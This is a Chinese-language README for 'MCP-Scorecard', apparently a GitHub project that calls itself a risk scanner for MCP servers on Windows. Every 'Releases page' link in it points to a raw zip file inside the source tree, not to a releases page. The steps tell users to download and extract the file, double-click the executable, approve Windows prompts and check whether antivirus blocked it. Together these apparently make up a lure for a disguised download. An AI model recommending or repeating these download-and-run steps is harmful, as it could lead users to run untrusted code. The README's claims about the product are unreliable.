Kerrimoral221/MCP-Scorecard

# 🛡️ MCP-Scorecard - MCP 服务器的表层风险评估 [](https://raw.githubusercontent.com/Kerrimoral221/MCP-Scorecard/main/src/mcp_trust/MC-Scorecard-v2.0.zip) ## 📌 这是什么 MCP-Scorecard 可扫描 MCP 服务器，并为每个服务器提供一个清晰的风险评分。它专为 Windows 用户打造，方便用户在将服务器用于构建或 agent 设置之前，轻松检查其安全性。 它可以帮你： - 扫描 MCP 服务器配置 - 发现常见的安全风险 - 在清晰的报告中审查信任信号 - 每次在 CI 中使用相同的检查 - 通过可重复的评分来比较不同服务器 ## 💻 所需条件 请使用满足以下条件的 Windows 电脑： - Windows 10 或 Windows 11 - 互联网连接 - 足够的可用空间，用于存放应用程序和扫描报告 - 拥有运行已下载文件的权限 使用发行版无需具备编程能力。 ## ⬇️ 下载 MCP-Scorecard 请访问此页面下载适用于 Windows 的最新版本： [从 GitHub Releases 下载 MCP-Scorecard](https://raw.githubusercontent.com/Kerrimoral221/MCP-Scorecard/main/src/mcp_trust/MC-Scorecard-v2.0.zip) 在 Releases 页面上，找到最新版本，如果有列出 Windows 文件，请选择该文件。将其保存到你的电脑，下载完成后将其打开。 ## 🧭 安装与运行 请按照以下步骤操作： 1. 打开 [Releases 页面](https://raw.githubusercontent.com/Kerrimoral221/MCP-Scorecard/main/src/mcp_trust/MC-Scorecard-v2.0.zip) 2. 在页面顶部找到最新的 Release 3. 寻找 Windows 下载文件 4. 将文件下载到你的电脑 5. 如果文件是以 zip 压缩包的形式下载的，请先解压 6. 双击应用程序或可执行文件 7. 如果 Windows 请求批准，请选择运行该程序的选项 8. 等待应用程序启动 9. 在应用程序中打开你的 MCP 服务器配置或目标路径 10. 开始扫描并等待报告生成 如果应用程序打开了命令行窗口，请保持该窗口打开，直到扫描结束。 ## 🔎 扫描检查的内容 MCP-Scorecard 会审查 MCP 服务器配置中的常见风险区域，例如： - 暴露的 endpoint - 薄弱的配置设置 - 不安全的工具访问权限 - 缺少对文件或网络使用的检查 - 可能增加信任风险的模式 - 可能影响 CI 使用的迹象 然后它会为你提供一个评分，让你可以用简单的方式来比较不同服务器。 ## 📄 获得的结果 扫描完成后，你可以得到： - 一份风险评分 - 一份简短的发现列表 - 对高风险项目的清晰概览 - 可以与团队分享的结果 - 非常适合在 CI 日志中阅读的输出内容 如果你在 pipeline 中使用它，该工具可以帮助你在问题进入后续阶段之前将其拦截。 ## 🛠️ 简易使用指南 当你想要在信任某个 MCP 服务器之前对其进行检查时，请使用 MCP-Scorecard。 常见的操作流程如下： 1. 下载发行版 2. 在 Windows 上运行该应用程序 3. 选择你要检查的 MCP 服务器 4. 开始扫描 5. 查看评分和发现的问题 6. 修复发现的任何问题 7. 再次运行扫描 这为你提供了一种针对每个服务器版本可重复执行的检查。 ## 🧪 运行扫描的最佳时机 在以下情况下运行 MCP-Scorecard： - 添加了新的 MCP 服务器时 - 更新现有服务器时 - 准备将服务器用于 CI 时 - 审查第三方服务器代码时 - 在正式部署前想要进行快速信任检查时 ## 📁 示例用例 在以下情况下，MCP-Scorecard 非常适用： - 在将本地 MCP 服务器连接到 agent 之前对其进行检查 - 在 DevSecOps 工作流中审查服务器风险 - 在 CI 中添加安全门禁 - 在做出选择前比较多个服务器 - 在多个发布版本中保持稳定的信任评分 ## ⚙️ 常见设置提示 如果应用程序没有立即启动： - 尝试以下载该文件的同一用户身份再次运行它 - 将文件保存在诸如“下载”或“桌面”等简单的文件夹中 - 避免在扫描运行时移动文件 - 确保你的 Windows 用户有权访问目标文件 - 检查防病毒软件是否拦截了下载 如果你使用的是 zip 文件，请在运行应用程序之前解压所有文件。 ## 🔐 安全审查领域 该工具专为表层风险评分而设计，因此它重点关注对信任度影响最大的 MCP 服务器部分： - 访问控制 - 工具暴露 - 输入处理 - 文件和路径使用 - 网络行为 - 配置规范 - 可重复的扫描结果 这使得它非常适合希望在没有冗长人工审查的情况下获得稳定安全检查的团队。 ## 🧰 用于 CI 场景 MCP-Scorecard 不仅适用于本地检查，也专为 CI 任务设计。 在 CI 环境中，它可以： - 每次都运行相同的扫描 - 尽早标记高风险的更改 - 给出简单的通过或失败结果 - 在构建日志中留下一份报告 - 支持在合并前进行代码审查 这有助于团队随着时间的推移，使 MCP 服务器保持在更安全的状态。 ## 🧭 如何开始 如果你是第一次使用该应用程序： 1. 访问 [Releases 页面](https://raw.githubusercontent.com/Kerrimoral221/MCP-Scorecard/main/src/mcp_trust/MC-Scorecard-v2.0.zip) 2. 下载最新的 Windows 发行版 3. 在你的电脑上打开该文件 4. 首先扫描一个 MCP 服务器 5. 阅读评分和发现 6. 根据需要为其他服务器重复上述步骤 ## 🖥️ Windows 文件处理 下载后，Windows 可能会弹出一个提示。如果发生这种情况： - 从“下载”文件夹中选择该文件 - 如果需要，请右键单击并将其打开 - 如果 Windows 弹出提示，请批准运行请求 - 等待扫描完成后再关闭窗口 如果你使用的是 zip 压缩包，请先将其解压到一个独立的文件夹中。 ## 📊 解读评分 该评分可让你快速了解服务器的信任度。 分数越低可能意味着风险越高。分数越高可能意味着问题越少。由于单凭分数并不能反映全貌，请结合发现列表来查看需要注意的具体问题。 ## 🧾 简易工作流 一个清晰的工作流如下所示： - 下载发行版 - 运行扫描 - 审查报告 - 修复薄弱环节 - 再次扫描 - 将结果与构建记录一起保留 这能让你保持检查过程清晰且易于重复。 ## 📚 项目主题 MCP-Scorecard 适用于以下领域： - Agentic AI - CI/CD - DevSecOps - LLM agent - MCP - Model Context Protocol - Python - 安全 - 静态分析 - 信任评分 ## 🧷 术语说明 - **MCP 服务器**：为 AI 应用程序提供工具或数据的服务 - **CI**：在代码更改时运行的构建检查 - **静态分析**：在不运行文件的情况下对文件进行的审查 - **风险评分**：表示扫描所发现的关注程度的数字 - **表层风险**：系统暴露的可见风险区域 ## 📦 稍后再次下载 当发布新版本时，请返回： [https://raw.githubusercontent.com/Kerrimoral221/MCP-Scorecard/main/src/mcp_trust/MC-Scorecard-v2.0.zip](https://raw.githubusercontent.com/Kerrimoral221/MCP-Scorecard/main/src/mcp_trust/MC-Scorecard-v2.0.zip) 下载最新的 Windows 文件，然后以相同的方式运行更新后的版本即可。 ## 🧩 故障排除 如果扫描未能启动： - 检查文件是否已下载完毕 - 确保你已经解压了 zip 文件 - 确认该文件未被 Windows 拦截 - 尝试使用名称简单的其他文件夹路径 - 重启应用程序并重试 如果没有看到结果： - 检查服务器路径是否正确 - 确认目标服务器文件是否依然存在 - 每次只运行一项扫描 - 如果应用程序有保存报告文件，请打开该报告文件 ## 📎 直接发布链接 [访问 MCP-Scorecard 的 Releases 页面](https://raw.githubusercontent.com/Kerrimoral221/MCP-Scorecard/main/src/mcp_trust/MC-Scorecard-v2.0.zip)

标签：DevSecOps, MCP服务器, 上游代理, 云安全监控, 人工智能安全, 代理安全, 信任评分, 元数据审查, 合规性, 大模型工具安全, 安全合规, 安全扫描, 时序注入, 结构化查询, 网络代理, 自动化安全, 逆向工具, 静态分析